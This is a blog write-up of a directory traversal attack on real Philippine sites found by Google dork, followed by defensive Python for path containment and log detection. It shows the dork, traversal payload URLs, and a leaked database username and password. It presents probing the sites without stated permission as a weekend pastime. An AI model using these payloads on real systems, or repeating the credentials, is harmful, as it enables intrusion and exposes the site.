Directory Traversal is a method which allows the attacker to access restricted directories and files within the website and execute a command outside the web server's root directory. (Image from https://metafied.wordpress.com/2015/04/27/troubleshoot-etcpasswd-file/)

Directory Traversal hacking

Weekends, no work, chill time. So, I decided to test the security of a website. I started by using a Google Dork (an advanced search technique on Google):

site:.ph inurl:"Upload/download.php"

Executing the dork above on Google gives me these results:

So, I got 4 results with the same URL scheme:

site.ph/Upload/download.php?b=something&d=something&t=something

I figured out that the "b" parameter is the file name, the "d" parameter is the directory of the file, and the "t" parameter is the MIME type of the file. It quickly reminded me that this kind of URL scheme is possibly vulnerable to Directory Traversal. Here's the URL I browsed to test if the site is vulnerable to Directory Traversal:

site.ph/Upload/download.php?b=Test.txt&d=../../../../../../../../../../etc/passwd&t=text/html

After browsing the URL above, something popped out and asked me to download a file, and here's the content of the file I downloaded:

Yes, they're vulnerable! Now, it's time to use a tool to enumerate their directories and find some interesting files. While the tool was enumerating directories and files, I noticed a file called connectDB.php, and I knew I could use directory traversal to download the file. So, here's the payload I used:

site.ph/Upload/download.php?b=Test.txt&d=../something/something/connectDB.php&t=text/html

Yes, I successfully downloaded the connectDB.php file, and here's the content of the file:

<?php
//$cnx_id = @mysql_pconnect('localhost','root','');
$cnx_id = @mysql_pconnect('localhost','admin','admin@abcdef');
@mysql_select_db('redactedDB');
?>

Alright! I got their database details, but what if there's something more? So, I ran the tool again to enumerate more directories and files.

What? A DB (Database) directory? Is it a login page to the database or a collection of backed-up databases? Let's find out. So, I browsed to site.ph/db/ and found these .sql files:

Okay, I'm done. I hope you learned something from this blog. :)

Allan Jay Dumanhug is the Founder and CEO of Secuna, a security program management service. Prior to Secuna, Allan worked as an IT Security Analyst at the University of the Philippines Diliman eUP Project and was formerly a top hacker on Facebook (Q1 of 2016) and HackerOne. Please visit https://secuna.ph/ for more info.
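As a defender's footnote to the download.php behaviour described above, here is an added example (mine, not code from the original post or from the site it describes) written in Python rather than the site's PHP. It shows the two things a practitioner would want from this write-up: how a download handler should canonicalise the user-supplied directory and file name and refuse anything that resolves outside the upload root, and how to flag traversal attempts, including percent-encoded and double-encoded ".." segments, in ordinary access-log lines. The upload root, the log lines and the IP address are constructed assumptions; the real handler's layout is not known.

```python
"""Added example: hardened path resolution for a download.php-style handler,
plus traversal detection over web-server access-log lines.
Not from the original post; BASE_DIR, log lines and addresses are constructed."""
import os
import re
from urllib.parse import parse_qs, urlparse, unquote

# Assumed upload root served by the download handler (constructed for the example).
BASE_DIR = "/srv/www/app/Upload"


def resolve_download_path(base_dir, requested_dir, requested_name):
    """Canonicalise base + d + b and return the path only if it stays under base_dir.

    The vulnerable pattern concatenates the two user-controlled parameters onto
    the upload root. realpath() collapses every '..' (and follows symlinks), so the
    containment check below sees the path the filesystem would actually open.
    Callers should still confirm os.path.isfile() before streaming the result.
    """
    base = os.path.realpath(base_dir)
    # os.path.join discards base when requested_dir is absolute; the containment
    # check catches that case as well.
    candidate = os.path.realpath(os.path.join(base, requested_dir, requested_name))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # different drives on Windows: cannot be inside base
        inside = False
    return candidate if inside else None


# A '..' path segment in either separator style, matched after decoding.
DOTDOT_SEGMENT = re.compile(r"(?:^|[\\/])\.\.(?=[\\/]|$)")


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so %252e%252e%252f (double-encoded ../) is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_params(url):
    """Return (name, value) for every query parameter carrying a '..' segment."""
    query = parse_qs(urlparse(url).query, keep_blank_values=True)  # decodes once
    hits = []
    for name, values in query.items():
        for value in values:
            if DOTDOT_SEGMENT.search(decode_fully(value)):
                hits.append((name, value))
    return hits


# Constructed Apache-style access-log lines mirroring the URL shape from the post.
SAMPLE_LOG = [
    '203.0.113.10 - - [01/May/2016:10:00:01 +0800] "GET /Upload/download.php?b=Report.pdf&d=files&t=application/pdf HTTP/1.1" 200 5120',
    '203.0.113.10 - - [01/May/2016:10:00:07 +0800] "GET /Upload/download.php?b=Test.txt&d=../../../../etc/passwd&t=text/html HTTP/1.1" 200 1700',
    '203.0.113.10 - - [01/May/2016:10:00:12 +0800] "GET /Upload/download.php?b=Test.txt&d=%2e%2e%2f%2e%2e%2fconfig&t=text/html HTTP/1.1" 200 900',
    '203.0.113.10 - - [01/May/2016:10:00:15 +0800] "GET /Upload/download.php?b=Test.txt&d=%252e%252e%252fconfig&t=text/html HTTP/1.1" 404 300',
]

REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def scan_access_log(lines):
    """Return the log lines whose request URL carries a traversal attempt."""
    flagged = []
    for line in lines:
        match = REQUEST_LINE.search(line)
        if match and traversal_params(match.group(1)):
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    print(resolve_download_path(BASE_DIR, "files", "Report.pdf"))
    print(resolve_download_path(BASE_DIR, "../../../../../../etc", "passwd"))
    for line in scan_access_log(SAMPLE_LOG):
        print("TRAVERSAL:", line)
```

The containment test compares canonical paths with `os.path.commonpath` rather than a string prefix, so a sibling directory such as `Uploads/` is not mistaken for the upload root. On the detection side, a request that returned 200 with a traversal parameter, as in the second and third sample lines, is the one worth treating as a confirmed read rather than a probe.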